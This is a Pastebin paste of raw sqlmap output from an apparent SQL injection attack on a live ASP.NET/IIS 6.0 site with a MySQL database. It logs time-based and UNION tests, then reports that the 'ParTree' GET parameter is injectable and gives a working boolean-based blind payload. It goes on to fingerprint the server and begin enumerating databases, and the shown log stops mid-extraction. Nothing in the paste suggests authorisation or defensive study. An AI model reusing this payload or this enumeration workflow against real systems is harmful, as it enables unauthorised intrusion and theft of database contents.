Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [02:23:19] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'
- [02:23:25] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
- [02:23:29] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
- [02:24:07] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
- [02:24:37] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
- [02:25:05] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
- [02:25:53] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
- [02:26:25] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
- [02:27:08] [INFO] testing 'MySQL UNION query (NULL) - 31 to 40 columns'
- [02:27:50] [INFO] testing 'MySQL UNION query (NULL) - 31 to 40 columns'
- [02:28:26] [INFO] testing 'MySQL UNION query (NULL) - 41 to 50 columns'
- [02:28:59] [INFO] testing 'MySQL UNION query (NULL) - 41 to 50 columns'
- [02:29:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
- [02:29:57] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
- [02:30:30] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
- [02:31:03] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
- [02:31:30] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
- [02:32:00] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
- [02:32:42] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns'
- [02:33:14] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns'
- [02:33:42] [INFO] testing 'Generic UNION query (NULL) - 41 to 50 columns'
- [02:34:09] [INFO] testing 'Generic UNION query (NULL) - 41 to 50 columns'
- GET parameter 'ParTree' is vulnerable. Do you want to keep testing the others? [y/N] n
- sqlmap identified the following injection points with a total of 313 HTTP(s) requests:
- ---
- Place: GET
- Parameter: ParTree
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
- Payload: A=p&ParTree=-63')) AND 840=840# AND (('gGRl' LIKE 'gGRl
- ---
- [02:36:42] [INFO] testing MySQL
- [02:36:48] [INFO] confirming MySQL
- [02:36:53] [INFO] the back-end DBMS is MySQL
- web server operating system: Windows 2003
- web application technology: ASP.NET, Microsoft IIS 6.0
- back-end DBMS: MySQL >= 5.0.0
- [02:36:53] [INFO] fetching database names
- [02:36:53] [INFO] fetching number of databases
- [02:36:53] [INFO] retrieved:
- [02:37:05] [ERROR] unable to retrieve the number of databases
- [02:37:05] [INFO] falling back to current database
- [02:37:05] [INFO] fetching current database
- [02:37:05] [INFO] retrieved:
Add Comment
Please, Sign In to add comment